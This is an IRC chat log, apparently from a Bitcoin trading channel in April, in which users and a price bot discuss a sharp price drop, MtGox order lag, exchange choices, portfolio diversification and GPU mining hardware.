BTC [+] Apr 13 21:12:22 [BTCTC] [BITVPS] 2 @ 0.002 = 0.004 BTC [+] Apr 13 21:12:27 lol Apr 13 21:12:28 [BTCTC] [BITVPS] 10 @ 0.0021 = 0.021 BTC [+] Apr 13 21:12:31 My buddy bought at $260 Apr 13 21:12:35 ;;bids 100 Apr 13 21:12:37 ouch Apr 13 21:12:38 There are currently 7354.2787 bitcoins demanded at or over 100.0 USD, worth 763561.644301 USD in total. | Data vintage: 0.0044 seconds Apr 13 21:12:41 [BTCTC] [BITVPS] 10 @ 0.0022 = 0.022 BTC [+] Apr 13 21:12:44 [BTCTC] [BITVPS] 13 @ 0.002289 = 0.0298 BTC [+] Apr 13 21:12:48 [BTCTC] [BITVPS] 10 @ 0.0023 = 0.023 BTC [+] Apr 13 21:12:52 [BTCTC] [BITVPS] 10 @ 0.00236 = 0.0236 BTC [+] Apr 13 21:12:55 [BTCTC] [BITVPS] 14 @ 0.00237 = 0.0332 BTC [+] Apr 13 21:12:58 wow the wall is evaporating Apr 13 21:13:08 i havent bought since 68, other than day trading Apr 13 21:13:28 started buying at around 15 Apr 13 21:13:58 I bought at 10 Apr 13 21:14:03 well 12 Apr 13 21:14:13 and I thought buying in at 15 was going to be risky :P Apr 13 21:14:19 fuckers Apr 13 21:14:19 in below 3. Apr 13 21:14:20 13.27$ Apr 13 21:14:24 a bit more at 12 Apr 13 21:14:29 out all the way up Apr 13 21:14:35 ;;goxlag Apr 13 21:14:36 MtGox lag is 695.946633 seconds. During this time, light travels 1.39466926033 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 13 21:14:38 get goxxed Apr 13 21:14:59 Bugpowder: why be a scientist? you're totally better at trading Apr 13 21:15:11 i almost told my wife she got goxxed when somehting unfortunate happened yesterday Apr 13 21:15:22 then i realized she had no idea Apr 13 21:15:42 she have btc ? Apr 13 21:15:44 nah Apr 13 21:15:47 http://www.urbandictionary.com/define.php?term=goxxed Apr 13 21:15:50 good Apr 13 21:15:51 upvote that shit Apr 13 21:15:51 ;;bc,24hprc Apr 13 21:15:52 106.16 Apr 13 21:16:52 thestringpuller: but I could do both! Apr 13 21:17:21 Also if the price is falling, and the puts are too expensive, not a lot of opportunity to make money Apr 13 21:17:33 yeah mp goxxed us Apr 13 21:17:37 ;;ud goxxed Apr 13 21:17:39 http://www.urbandictionary.com/define.php?term=goxxed | Jun 26, 2011 ... The act of being screwed by an online merchant, specifically due to the merchant being incompetent and amateurish. Derived from the debacle ... Apr 13 21:17:52 BTCUSD ticker | Best bid: 108.10000, Best ask: 109.00000, Bid-ask spread: 0.90000, Last trade: 109.00000, 24 hour volume: 319521.71206729, 24 hour low: 75.32006, 24 hour high: 130.00000, 24 hour vwap: 106.10934 Apr 13 21:17:52 Bugpowder: if the price falls and you have a lot of coins can't you sell and repurchase? Apr 13 21:17:54 I will probably go focus more on science for the next few months and wait till the bottom Apr 13 21:18:03 thestringpuller: yes that is my plan Apr 13 21:18:15 dumped a ton last night at 128, and more today at 114 Apr 13 21:18:24 I will sit on the rest Apr 13 21:18:38 and keep plenty of coin on gox to buy if it really collapses Apr 13 21:19:00 I am about 70% cashed out now Apr 13 21:19:13 i'm about 50% Apr 13 21:19:21 stuck in some assets Apr 13 21:19:22 Bugpowder: you buying gold at all? Apr 13 21:19:33 I have a few ounces Apr 13 21:19:42 but no major investment position Apr 13 21:19:51 that is something to look at certainly Apr 13 21:19:57 with the recent drop in price Apr 13 21:20:16 mostly just in a diversified portfolio of stocks and bonds Apr 13 21:20:28 based on the recommendations in The Intelligent Asset Allocator Apr 13 21:20:34 Bugpowder what if another buying frenzy occurs while you are focusing on research? Apr 13 21:21:00 Hopefully I'll catch some of it! Apr 13 21:21:28 William Bernstein (Author) Apr 13 21:21:28 If any of you have made a lot of money on this market, and don't have a diversified portfolio, now might be a good time to open an account with Vanguard Apr 13 21:21:33 lol, how stereotypical Apr 13 21:22:00 http://www.amazon.com/Intelligent-Asset-Allocator-Portfolio-Maximize/dp/0071362363 Apr 13 21:22:46 ;;bids 100 Apr 13 21:22:46 There are currently 6888.6826 bitcoins demanded at or over 100.0 USD, worth 711859.547123 USD in total. | Data vintage: 4.4094 seconds Apr 13 21:22:51 wow Apr 13 21:23:46 lag is holding the price up Apr 13 21:24:53 lag is everyone dodging the knife Apr 13 21:24:57 dude, where the fuck is smickels Apr 13 21:25:10 being busy isn't excuse for freezing someone's account Apr 13 21:26:25 PRPFX is an interesting fund too Apr 13 21:26:26 http://www.reuters.com/article/2012/11/26/us-column-wasik-capital-idUSBRE8AP0UL20121126?feedType=RSS&feedName=PersonalFinance&rpc=43 Apr 13 21:26:51 My father has quite a bit in it and it did spectacularly well through the crash and recovery Apr 13 21:27:08 I may put some in it, though I HATE paying fees. Apr 13 21:28:09 so sell now and wait to rebuy at 30? Apr 13 21:28:16 4~mtgox shutting itself down again for quick intervals after sharp drops Apr 13 21:28:17 ... Apr 13 21:28:38 altoz: I can't give recommendations, but that is what I am doing. Apr 13 21:28:43 or trying to do Apr 13 21:28:50 probably to keep the database from murdering itself Apr 13 21:29:44 Hi Apr 13 21:30:12 [BTCTC] [PAJKA.BOND] 1 @ 0.1018 BTC [+] Apr 13 21:30:23 hi Apr 13 21:30:36 ;;title http://www.youtube.com/watch?v=QIvxarOmRGk Apr 13 21:30:37 A Nasdaq of Bitcoin? - YouTube Apr 13 21:30:46 [BTCTC] [PAJKA.BOND] 1 @ 0.1019 BTC [+] Apr 13 21:30:51 Cmon, 30 srsly ? give me one important change in BTC since 1 week ? no price related Apr 13 21:31:02 i bought in to sdice at .0075 today i have a officially arbed myself down to market price Apr 13 21:31:04 :) Apr 13 21:31:45 error, its way more complicated than that Apr 13 21:32:15 you cant say, Apr 13 21:32:26 tell me why the price will change, aside from the price changing Apr 13 21:33:02 massive take of benefit after a 150% rise in a week Apr 13 21:33:06 error4733: the bubble started at $15 Apr 13 21:33:27 I think by the time we get back down, the bitcoin economy will be able to support 30 Apr 13 21:33:33 but we could dip below 20 Apr 13 21:33:47 and then we grow up from there Apr 13 21:33:49 to 50 or so Apr 13 21:33:56 and perhaps another bubble forms Apr 13 21:33:59 this time to 2000 Apr 13 21:34:03 ThickAsThieves> i bought in to sdice at .0075 today i have a officially arbed myself down to market price <- what you mean Apr 13 21:34:19 sounds resonable to me Apr 13 21:34:37 i mean that i've been doing arb for mos Apr 13 21:34:47 to negate my loss Apr 13 21:35:10 what you're arbing it against Apr 13 21:35:27 all exchanges Apr 13 21:35:36 [BTCTC] [ASICMINER-PT] 4 @ 0.781 = 3.124 BTC [-] Apr 13 21:35:38 ohh okay Apr 13 21:35:39 [BTCTC] [ASICMINER-PT] 2 @ 0.78025 = 1.5605 BTC [-] Apr 13 21:35:47 i have sdice everywhere Apr 13 21:35:47 i thought it was only traded at mpex Apr 13 21:36:05 havelock, btct, mpex, bitfunder Apr 13 21:36:24 twas a lot of work Apr 13 21:36:42 how can i trade on gox right now if its gox'ed Apr 13 21:36:54 ok the most important is we reach 262$.... when i bought @13 like me the ATH was 32$. Now Its 262 ffs, change everything Apr 13 21:37:05 ;;goxlag Apr 13 21:37:06 MtGox lag is 1451.840455 seconds. During this time, light travels 2.9094720162 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 21:37:10 horrible Apr 13 21:37:27 cant they just reboot or somehting geez Apr 13 21:37:50 [BTCTC] [BTC-BOND] 500 @ 0.01 = 5 BTC [-] Apr 13 21:37:54 anyone know how to cancel a limit order on gox right now? Apr 13 21:37:58 cancel button doesn't work Apr 13 21:38:06 hit cancel, wait, and pray Apr 13 21:38:09 ;;goxlag Apr 13 21:38:10 MtGox lag is 1489.227845 seconds. During this time, light travels 2.98439592715 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 21:38:15 haha Apr 13 21:38:33 he work but you have to wait 1489s Apr 13 21:39:51 someone left a big wall up at 110 on bitfloor if anyone wants to try and grab it Apr 13 21:39:52 the cancel won't show up Apr 13 21:40:11 ;;title http://www.youtube.com/watch?v=I8LU3uaQG10 Apr 13 21:40:12 Fred Wilson on Bitcoin, Airbnb and immigration - YouTube Apr 13 21:40:16 but in my experience it will check for a cancel before it actually gets executed Apr 13 21:40:30 I have placed market orders during lag Apr 13 21:40:36 and cancelled them Apr 13 21:40:51 and there was huge delay for the cancellation to show up Apr 13 21:41:03 but the market order never executed Apr 13 21:43:34 thats good to know - I just placed one, and canceled it while it's lagged out Apr 13 21:44:43 lotsa bids at 109 on campbx too if anyone needs to sell Apr 13 21:44:46 ;;goxlag Apr 13 21:44:47 MtGox lag is 1668.459377 seconds. During this time, light travels 3.34357391051 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 21:45:02 how long could i get my btc to campbx if its in btc-e Apr 13 21:45:09 or usd for that matter Apr 13 21:45:19 usd aint gonna happen Apr 13 21:45:26 btc 30m-6hrs Apr 13 21:45:27 i have some btc in gox to transfer over Apr 13 21:45:38 even with fee Apr 13 21:45:39 i wouldnt try to send btc from or to gox right now Apr 13 21:45:42 damn Apr 13 21:45:58 ;;seen smickles Apr 13 21:45:58 smickles was last seen in #bitcoin-assets 1 week, 2 days, 3 hours, 3 minutes, and 28 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 13 21:46:00 it taked FOREVER sometimes Apr 13 21:46:17 it seemthe U.S. isn't very popular these days Apr 13 21:46:29 ;;goxlag Apr 13 21:46:30 MtGox lag is 1608.853804 seconds. During this time, light travels 3.22412500959 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 21:46:43 that cant be caused by trade traffic Apr 13 21:46:55 btc-e is like the only exchange that works nicely Apr 13 21:47:08 therefore all the ddos must be the ruskis Apr 13 21:47:29 someone lured the gox team out of their office with a slice of pizza Apr 13 21:47:51 they are like, dude its nap time, ttyl Apr 13 21:48:21 ;;goxlag Apr 13 21:48:21 MtGox lag is 1697.823738 seconds. During this time, light travels 3.40241976117 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 21:48:22 really? Apr 13 21:48:37 in the past day i have turned .3btc into 1 on btc-e, i win Apr 13 21:48:47 how did lag go up this high Apr 13 21:48:50 without any price move Apr 13 21:48:58 its like it just kept going up Apr 13 21:49:01 and then cam a crash Apr 13 21:49:05 i mean a dip Apr 13 21:49:05 because everyone is reordering bids Apr 13 21:49:19 what happens is Apr 13 21:49:24 no fee :) Apr 13 21:49:38 when whatever powers that be are ready to dive the price, Apr 13 21:49:43 i just noticed this lag now, when did it start? Apr 13 21:49:48 they move all their bids lower Apr 13 21:49:56 since gox has soft order system Apr 13 21:50:04 it takes forever to update Apr 13 21:50:08 lol Apr 13 21:50:10 okay Apr 13 21:50:50 i bet gox will behave much differently when soft order features are removed Apr 13 21:51:22 then again, bots could potentially spam orders too... Apr 13 21:51:36 they need an order fee Apr 13 21:51:58 at least for bots Apr 13 21:53:19 hmmm Apr 13 21:53:24 i have to go to a wedding soon Apr 13 21:53:28 cmon gox Apr 13 21:53:34 well Apr 13 21:53:40 this could be a nice ripple trade coming up Apr 13 21:53:54 but hard to know where the bottom will be Apr 13 21:54:00 I'm not going to do i Apr 13 21:54:02 do it Apr 13 21:54:25 [MPEX] [S.MPOE] 4736 @ 0.000728 = 3.4478 BTC [+] Apr 13 21:54:26 [MPEX] [S.MPOE] 8233 @ 0.00072947 = 6.0057 BTC [+] Apr 13 21:54:29 killall -9 tuxengine.php Apr 13 21:54:33 [MPEX] [S.MPOE] 181 @ 0.00073 = 0.1321 BTC [+] Apr 13 21:55:07 put a 1 satoshi order fee for bots or something Apr 13 21:55:47 where ur trading ripples Apr 13 21:58:34 ;;ticker Apr 13 21:58:35 BTCUSD ticker | Best bid: 105.81088, Best ask: 107.89000, Bid-ask spread: 2.07912, Last trade: 107.89000, 24 hour volume: 311365.72938362, 24 hour low: 77.00000, 24 hour high: 130.00000, 24 hour vwap: 107.06205 Apr 13 21:58:37 ;;goxlag Apr 13 21:58:38 MtGox lag is 1686.244973 seconds. During this time, light travels 3.37921604575 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 22:01:01 taub I mean oscillation, not ripple the currency Apr 13 22:01:16 hah okay Apr 13 22:01:19 :) Apr 13 22:01:21 http://i.imgur.com/TfSNGC5.png Apr 13 22:01:25 wherever it falls, we'll see at least one more notable bounce i think Apr 13 22:01:31 http://i.imgur.com/YBYOjNn.png Apr 13 22:01:34 yeah Apr 13 22:01:35 im no hero i dont trade with 30 min lag Apr 13 22:01:41 I mean, don't panic here folks Apr 13 22:01:53 We will probably bounce around 100 for a while Apr 13 22:02:09 I'm just thinking on the 3 month time horizion Apr 13 22:02:26 quote 4 glory Apr 13 22:03:39 too many people will wanna buy next week, itll be hard for it totally crash Apr 13 22:04:08 yeah Apr 13 22:04:15 there is tons of people wanting in Apr 13 22:04:22 still Apr 13 22:04:32 clarkboody just went all fractal on me Apr 13 22:04:38 moody* Apr 13 22:04:51 ok it fixed Apr 13 22:06:53 [BTCTC] [BTC-BOND] 500 @ 0.01 = 5 BTC [-] Apr 13 22:07:33 104 Apr 13 22:08:23 this lag is so shifty Apr 13 22:08:47 ;;bids 0 Apr 13 22:08:50 yeah Apr 13 22:08:51 There are currently 44087491 bitcoins demanded at or over 0.0 USD, worth 14085029.0865 USD in total. | Data vintage: 0.0100 seconds Apr 13 22:08:53 ;;asks 999999999 Apr 13 22:08:53 There are currently 113018.02 bitcoins offered at or under 999999999.0 USD, worth 3901036048.27 USD in total. | Data vintage: 3.6511 seconds Apr 13 22:08:55 the swebsite is working fine Apr 13 22:08:58 just lag Apr 13 22:09:04 cant really call it ddos Apr 13 22:09:26 ;;goxlag Apr 13 22:09:27 MtGox lag is 1619.727358 seconds. During this time, light travels 3.24591549006 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 13 22:13:51 ;;ticker Apr 13 22:13:52 BTCUSD ticker | Best bid: 104.00002, Best ask: 105.00000, Bid-ask spread: 0.99998, Last trade: 104.00002, 24 hour volume: 303945.09547122, 24 hour low: 77.00000, 24 hour high: 130.00000, 24 hour vwap: 107.75710 Apr 13 22:14:48 here we go boys! Apr 13 22:14:48 whats the command for the diff predictor Apr 13 22:15:26 ;;bc,stats Apr 13 22:15:30 Current Blocks: 231182 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 657 blocks | Next Difficulty In About: 4 days, 3 hours, 10 minutes, and 11 seconds | Next Difficulty Estimate: 8979353.11245 | Estimated Percent Change: 17.02533 Apr 13 22:15:55 ;;difficulty Apr 13 22:15:56 Error: "difficulty" is not a valid command. Apr 13 22:16:52 heh, I did the math Apr 13 22:16:52 at current prices Apr 13 22:17:58 101 Apr 13 22:18:02 my 7970 will be out of the game in 5.85x increase in diff Apr 13 22:18:22 look at that 100 floor going down fast Apr 13 22:18:46 Diablo-D3: 7970 what? Apr 13 22:18:50 is that an ATI card? Apr 13 22:18:59 http://youtu.be/JaKCM8myJ9I Apr 13 22:19:02 great link Apr 13 22:19:56 yes' Apr 13 22:22:16 so, question diablo Apr 13 22:22:25 why do nvidia cards suck Apr 13 22:22:41 ;;ticker Apr 13 22:22:42 BTCUSD ticker | Best bid: 101.61000, Best ask: 102.00000, Bid-ask spread: 0.39000, Last trade: 102.00000, 24 hour volume: 303614.33007520, 24 hour low: 77.00000, 24 hour high: 130.00000, 24 hour vwap: 107.93766 Apr 13 22:22:44 is it that they don't run sha-256 well Apr 13 22:22:59 and is it possible to change the algorithm so it would run better on them Apr 13 22:23:44 i mean you can optimize algorithms for different hardware Apr 13 22:23:59 has anyone tried to implement it for an nvidia card? Apr 13 22:24:28 less cores Apr 13 22:24:36 ATI uses more cores that are less powerful Apr 13 22:24:49 but you don't need power, you need paralleization Apr 13 22:24:53 yes Apr 13 22:25:00 i get that Apr 13 22:25:14 hmmm...i wonder if you could reimplement the design though Apr 13 22:25:23 from what i saw in the fpga world Apr 13 22:25:25 yah, som ati cores have 4096 cores Apr 13 22:25:26 boom Apr 13 22:25:29 gotta run Apr 13 22:25:31 they focused on latency Apr 13 22:25:32 later dudes Apr 13 22:25:34 not throughput Apr 13 22:25:36 enjoy the frenzy Apr 13 22:26:05 https://www.youtube.com/watch?v=JaKCM8myJ9I&feature=youtu.be Apr 13 22:26:28 i just posted that Apr 13 22:27:56 sorry, forgot which channel I got it from Apr 13 22:28:08 lol np Apr 13 22:28:21 was just curious Apr 13 22:30:58 [HAVELOCK] [HIM] 1 @ 1.55 BTC [+] Apr 13 22:31:57 [HAVELOCK] [VTX] 1 @ 0.37 BTC [+] Apr 13 22:34:41 so Diablo-D3, my friend is into vhdl, he said that people have focused on lower latency rather than higher throughput Apr 13 22:34:57 ;;bids 32 Apr 13 22:34:59 There are currently 162992.2 bitcoins demanded at or over 32.0 USD, worth 9357129.59605 USD in total. | Data vintage: 0.0064 seconds Apr 13 22:35:03 ;;bids 30 Apr 13 22:35:03 There are currently 172070.76 bitcoins demanded at or over 30.0 USD, worth 9633345.26043 USD in total. | Data vintage: 4.1968 seconds Apr 13 22:36:19 mjr___: in context of what? Apr 13 22:36:28 !facts Apr 13 22:36:38 ;;facts Apr 13 22:36:39 To see a nice sortable web view of all factoids, click here: http://gribble.dreamhosters.com/viewfactoids.php?db=%23bitcoin-assets || To see a list of the most popular factoids, run !rank || To search factoids, run !factoids search Apr 13 22:36:56 for example...in the open source fpga project Apr 13 22:37:01 they use distributed ram Apr 13 22:37:07 wasting LUT's on memory Apr 13 22:37:10 ;;help Apr 13 22:37:10 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Apr 13 22:37:23 ;;lag Apr 13 22:37:24 Error: "lag" is not a valid command. Apr 13 22:37:50 his theory was to take 200 clock cycles or whatever to load in the first attempt at a hash, after that point, you are doing one hash per clock cycle Apr 13 22:38:29 the main problem is the UART is a bottleneck, you have to serialize it Apr 13 22:38:55 mjr___: I dont see the point in decreasing latency in that Apr 13 22:39:03 so as you load it bit by bit, you can pipeline the whole thing, so it doesn't even need memory at all Apr 13 22:39:07 stop the gox, you cant stop the gox Apr 13 22:39:09 mjr___: its why Im a fan of sea of rolled cores over unrolled cores Apr 13 22:39:15 ;;title https://www.youtube.com/watch?v=4GHN1Mu6VG0 Apr 13 22:39:16 Apollo 440 - Stop The Rock - YouTube Apr 13 22:39:16 you get better hardware usage Apr 13 22:40:53 btce surpassing mtgox easily in the last half hour in volume... Apr 13 22:40:59 because guess what Apr 13 22:41:08 nobody wants to trade on your piece of shit exchange tux Apr 13 22:41:19 30 minutes lag? no thanks Apr 13 22:41:48 "we'll entice you with 0 fees Apr 13 22:41:51 " Apr 13 22:42:00 worst, most illogical idea ever Apr 13 22:42:17 dont thing the fees are to blame really Apr 13 22:42:20 we are bad at doing our current volume...let's make LESS money, and make the problem worse in one fell swoop Apr 13 22:42:41 its the fact that they aren't limiting "lot size" Apr 13 22:43:13 so now i can keep spamming .02 bitcoin orders for no fees, so i can jump in and out whenever i want, trying to make pennies in difference Apr 13 22:43:43 you not only increase the volume from new people, you make it more viable for bots to send more orders Apr 13 22:43:57 its all about incentives Apr 13 22:44:11 double fees for smaller orders Apr 13 22:44:18 it's all about common sense which they lack Apr 13 22:44:22 exactly Apr 13 22:45:05 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Apr 13 22:49:57 [HAVELOCK] [SDICE] 14 @ 0.34999999 = 4.9 BTC [+] Apr 13 22:52:26 maybe they're faking lag to "cool down" prices Apr 13 22:52:35 wouldnt put it past them Apr 13 22:52:58 [HAVELOCK] [SDICE] 2 @ 0.35 = 0.7 BTC [+] Apr 13 22:53:56 [BTCTC] [ASICMINER-PT] 6 @ 0.81 = 4.86 BTC [+] Apr 13 22:53:58 [BTCTC] [B.YABMC] 1 @ 0.01499 BTC [-] Apr 13 23:02:40 ;;goxlag Apr 13 23:02:41 MtGox lag is 2632.795993 seconds. During this time, light travels 5.27609369172 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 13 23:03:07 really... volume not heavy at all... anyone know anything? Apr 13 23:04:10 pgp - while the lag-times are still rising, the system is functionally dead. I take the tiny-volume orders as just that - evidence that the engine remains, for all practical purposes, fully choked. Apr 13 23:04:20 pgp: volume is not really very a good indicator Apr 13 23:04:25 since we are looking at volume in coins Apr 13 23:04:40 their could be 1000 orders for every coin Apr 13 23:04:42 or 1 Apr 13 23:04:45 Over the last few days, I've waited to see 3 or 4 continuous bars with real volume (on a M1 chart) before getting any confidence the lag was about to abate. Apr 13 23:05:30 with no fees...you only incentivize .01 orders... Apr 13 23:05:55 ;;goxlag Apr 13 23:05:56 MtGox lag is 2739.858146 seconds. During this time, light travels 5.4906450476 AU. You could have sent a bitcoin from the Sun to Jupiter (5.2 AU). Apr 13 23:05:57 its retarded Apr 13 23:06:11 this is getting out of hand. Apr 13 23:07:03 ;;ticker Apr 13 23:07:04 BTCUSD ticker | Best bid: 96.52950, Best ask: 99.90000, Bid-ask spread: 3.37050, Last trade: 99.90000, 24 hour volume: 291952.19874457, 24 hour low: 85.00000, 24 hour high: 130.00000, 24 hour vwap: 108.98717 Apr 13 23:07:19 time for open outcry...meet me in central park lol Apr 13 23:08:01 so bitcoin24 is done, eh? Apr 13 23:08:57 [BTCTC] [GSDPT] 1000 @ 0.003734 = 3.734 BTC [+] Apr 13 23:09:24 [BTCTC] [GSDPT] 250 @ 0.003734 = 0.9335 BTC [+] Apr 13 23:10:49 mjr___: haha, that'd be awesome Apr 13 23:11:17 can i actually cancel orders with status pending in mtgox ? Apr 13 23:11:56 yes Apr 13 23:12:05 gox running at one order per second Apr 13 23:12:14 order, not trade... Apr 13 23:15:22 trade engine cooldown? when did that happen? Apr 13 23:19:16 so trading is back in1 minute? Apr 13 23:19:19 ?? Apr 13 23:19:55 their stupid attempts to manipulate price Apr 13 23:19:58 [MPEX] [S.MPOE] 5534 @ 0.00073 = 4.0398 BTC [+] Apr 13 23:20:07 [MPEX] [S.MPOE] 9916 @ 0.000735 = 7.2883 BTC [+] Apr 13 23:20:12 wonder if they bought a lot themselves at 250 Apr 13 23:20:31 how would it help them to buy there and then tank the price? Apr 13 23:20:38 i don't think they are taking advantage in killing bit coin and their own business Apr 13 23:20:48 well maybe they think they are helping the price by making trading impossible Apr 13 23:21:12 lol Apr 13 23:21:33 they already suspended trading 12 hours once for it Apr 13 23:21:44 but prices had been risign Apr 13 23:21:46 rising Apr 13 23:21:57 they should suspend it for good, until they fix their servers Apr 13 23:22:00 now, if orders are shut down for 20 minutes...wouldn't you think their lag would make progress in that interim? Apr 13 23:22:11 just like they did zhen they were hacked Apr 13 23:26:26 i think its an opencl thing Apr 13 23:28:25 opencl? really? Apr 13 23:31:09 lag charts from orkaa http://jezus.si/graf/dashboards/bitcoin/details/lag/ Apr 13 23:31:20 sweet jesus! Apr 13 23:32:30 those are great charts. thanks you jezus! Apr 13 23:32:58 [HAVELOCK] [HIM] 3 @ 1.55 = 4.65 BTC [+] Apr 13 23:33:47 he also has a price chart overlaying 4 biggest exchanges - also nice... Apr 13 23:34:00 http://jezus.si/graf/dashboards/bitcoin/details/all/ Apr 13 23:35:22 768 coins traded on gox at 92.xx Apr 13 23:36:04 yess..great charts Apr 13 23:36:34 orkaa - you online? take a bow! Apr 13 23:36:40 91 Apr 13 23:36:58 [MPEX] [S.MPOE] 10000 @ 0.00070378 = 7.0378 BTC [-] Apr 13 23:37:00 [MPEX] [S.MPOE] 10250 @ 0.00070377 = 7.2136 BTC [-] Apr 13 23:37:03 wow big dive on btc-e Apr 13 23:37:05 8 dollare spread Apr 13 23:37:34 bitstamp too Apr 13 23:37:49 i must not have refreshed my screen I was seeing almost $100 one minute next minute $84 Apr 13 23:38:03 really hard to trade with lag like this Apr 13 23:38:07 market data is suspect Apr 13 23:38:22 order execution is spotty Apr 13 23:38:26 mjr: i was thinking that since wed/thurs Apr 13 23:38:31 yeeah Apr 13 23:38:42 i sold 5 coins locally Apr 13 23:38:53 that seems to be the best bet! i bet Apr 13 23:39:03 i mean, i didn't want to sell a lot Apr 13 23:39:11 it was only cuz a friend wanted to get in Apr 13 23:39:21 you are holding on then.. Apr 13 23:39:25 of course Apr 13 23:39:32 going to try to double my position tomorrow Apr 13 23:39:35 if prices are right Apr 13 23:39:38 nice! Apr 13 23:39:41 mjr - who? Apr 13 23:39:56 my friend doug Apr 13 23:40:35 you'll be able to buy them back cheaper now Apr 13 23:40:35 is there a market where you can deposit money really fast? Apr 13 23:40:44 with low fees Apr 13 23:40:46 bitfloor Apr 13 23:40:55 how fast? Apr 13 23:41:35 localtill through bac of america - if you can find a branch that's open... Apr 13 23:41:57 go to there website and it will tell you Apr 13 23:42:22 within 1/2 hour to 1 hour... Apr 13 23:42:57 other ways too, but higher fees, but maybe only option on weekend... bitinstant... Apr 13 23:45:09 http://blockchain.info/charts/my-wallet-n-users?showDataPoints=false&show_header=true&daysAverageString=1×pan=&scale=1&address= Apr 13 23:45:15 number of mywallet users Apr 13 23:45:39 <+amphipod> Apr13 20:44:38 mtgox x122 2,021.8965 @ 92.90482106 USD Apr 13 23:45:48 that's a lot of coin Apr 13 23:46:21 what does the x122 mean? this purchase times 122? Apr 13 23:46:23 fuck 90 gone just like that Apr 13 23:46:40 was that a bid or ask? Apr 13 23:46:41 86 Apr 13 23:46:56 bid Apr 13 23:47:08 pgp, bitinstant sounds good, but i am from germany Apr 13 23:47:19 i dont have lots of possibilities there, only coupons Apr 13 23:47:23 isn't bitstamp in the eurozone? Apr 13 23:47:30 localbitcoins.com? Apr 13 23:47:34 uk Apr 13 23:48:04 php/mysql hobbyists cant run an exchange. more at 11 Apr 13 23:48:04 <+amphipod> Apr13 20:46:21 mtgox x130 1,658.7634 @ 87.97088002 USD Apr 13 23:48:21 pgp: https://www.youtube.com/watch?v=JaKCM8myJ9I Apr 13 23:48:38 bitstamp is in slovenia Apr 13 23:49:03 ah, but you can send using sepa? Apr 13 23:49:13 yes Apr 13 23:49:15 idd Apr 13 23:50:00 sepa takes nearly a day mostly i think Apr 13 23:50:04 working day Apr 13 23:50:24 1-3 actually :P Apr 13 23:50:31 gox suspended trade again? Apr 13 23:50:54 i wonder if there are any good deals on localbitcoins Apr 13 23:51:07 lots of scammers there Apr 13 23:51:26 especially in munich area Apr 13 23:51:30 true Apr 13 23:51:34 use their escrow Apr 13 23:52:18 i talked to a guy yesterday, who told me that his daddy doesnt support this anymore... Apr 13 23:52:20 hmmm, cash in hand still carries a premium, i think that shows something Apr 13 23:52:34 https://www.bitcoin.de/en is in germany Apr 13 23:52:41 its around 95-113 on local Apr 13 23:52:57 pgp, i know this Apr 13 23:53:05 but i am searching for something that is faster than sepa Apr 13 23:53:18 i need to get more money on the markets Apr 13 23:53:30 dont want to wait till monday or even tuesday Apr 13 23:53:44 bitinstant...think that's the only way Apr 13 23:53:50 sellorder for 283.9 btc on btc-e Apr 13 23:53:53 at $89 Apr 13 23:53:54 well - if they are physically not too far - you might be able to give them a bag of euros... Apr 13 23:54:09 make it a briefcase... Apr 13 23:54:10 b0n1, could buy Linden Dollars Apr 13 23:55:13 the thing that gives me the most hope is that this is an idea that takes all kinds Apr 13 23:55:23 republicans and democrats...english speakers and others Apr 13 23:55:30 it should fade into the background Apr 13 23:55:34 and just be there Apr 13 23:55:47 as a layer of financial stability Apr 13 23:56:02 there will be a few of them Apr 13 23:56:11 i never thought i would agree with larry kudlow on anything Apr 13 23:56:12 not all will make the cut Apr 13 23:56:31 i am what you would call a liberal... Apr 13 23:57:05 when I say few, I mean bitcoins, ripples, etc Apr 13 23:58:49 ;;goxlag Apr 13 23:58:49 MtGox lag is 3.892995 seconds. During this time, light travels 0.00780151839186 AU. You could have sent a bitcoin from Saturn to its largest moon, Titan (0.00802 AU). Apr 13 23:58:54 bullshit Apr 13 23:59:01 wtf is going on Apr 13 23:59:14 did they not halt again? Apr 13 23:59:51 that lag figure is bogus Apr 14 00:00:00 because they are not doing any trading right now i thought Apr 14 00:00:02 there's like a trade every minute Apr 14 00:00:23 trading up on other exchnges, though Apr 14 00:00:40 yes, but that wouldn't be in goxlag Apr 14 00:00:48 thats why the figure is bogus right now Apr 14 00:01:12 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] Apr 14 00:02:18 ThickAsThieves: looks exactly like the exit of the bull trap indeed Apr 14 00:03:01 uh oh 86 Apr 14 00:03:12 scrat - yes! Apr 14 00:03:13 btce higher price than gox lol Apr 14 00:03:21 i've all but decided to ignore mt gox Apr 14 00:03:27 massive spread Apr 14 00:04:06 mjr: ignore all you want, but that is where the volume is whether we like it or not... Apr 14 00:04:11 true Apr 14 00:04:23 but i think that none of the info is accurate right now Apr 14 00:04:44 basically i meant i am removing myself from the day to day speculation Apr 14 00:04:56 in a year, we won't have to worry about this Apr 14 00:05:21 smart Apr 14 00:05:37 i personally think that this is proven to be valuable, the shitty exchanges, the amateurish business practices...those will fade away Apr 14 00:05:52 ;;ticker Apr 14 00:05:53 BTCUSD ticker | Best bid: 92.30000, Best ask: 97.70000, Bid-ask spread: 5.40000, Last trade: 97.70000, 24 hour volume: 277905.74548814, 24 hour low: 86.10000, 24 hour high: 130.00000, 24 hour vwap: 109.98186 Apr 14 00:06:06 how are these trolls saying $45 on cocks Apr 14 00:06:11 [MPEX] [S.MPOE] 20900 @ 0.00070861 = 14.8099 BTC [+] Apr 14 00:06:18 damn trollbox Apr 14 00:06:23 hahaha Apr 14 